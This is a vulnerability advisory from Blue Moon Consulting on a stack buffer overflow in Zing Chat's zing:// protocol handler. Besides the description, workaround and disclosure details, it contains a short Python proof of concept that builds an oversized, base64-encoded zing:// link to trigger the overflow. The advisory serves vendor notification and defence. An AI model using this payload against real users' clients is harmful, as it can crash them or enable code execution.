Description

VinaGame Zing Chat contains a buffer overflow error in its PPFTCtrl module that possibly allows an attacker to run arbitrary code. At the very least, the attacker is able to crash Zing Chat.

In parsing zing://RegisterPPDownLoadFileFunc protocol, input values are not length-checked. These values are later wcscpy and wcscat to local buffers resulting in buffer overflows.

The overflow would overwrite saved return address and give an attacker control over execution flow if not for the stack smashing protection built into the compiler. However, there is a slim chance that the attacker is able to predict the canary value and hence bypass this protection.

Workaround

Do not click on any link that starts with zing://.

Fix

There is no fix at the moment. Customers are advised to contact the vendor directly for a proper fix.

Disclosure

Blue Moon Consulting adapts RFPolicy v2.0 in notifying vendors.

a = '<fdctt ver="1" jobid="C55F718A-3206-4A98-AA42-15B36054F010" tribeid="21569327264368" tribename="Th\xe1\xba\xbf Gi\xe\xbb\x9bi Phim" toolid="{4588C3CB-972A-43d5-A78E-E1BEE00E9E3E}" fileid="{268DCE6E-8406-65D6-F22B-15A876123862}" filename="barnyard.avi" tracker="Tracker.chat.zing.vn" comid="1"/>'

b = a.replace("barnyard.avi", 'a' * 4000).encode("base64").replace("\n", "")

print "zing://RegisterPPDownLoadFileFunc/?content=%s" % b

Disclaimer

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.